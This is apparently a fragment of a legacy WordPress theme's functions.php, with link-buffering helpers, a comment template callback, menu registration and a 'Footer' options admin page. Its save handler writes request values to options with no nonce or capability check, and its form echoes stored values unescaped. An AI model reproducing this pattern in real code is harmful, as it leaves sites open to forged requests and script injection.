		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
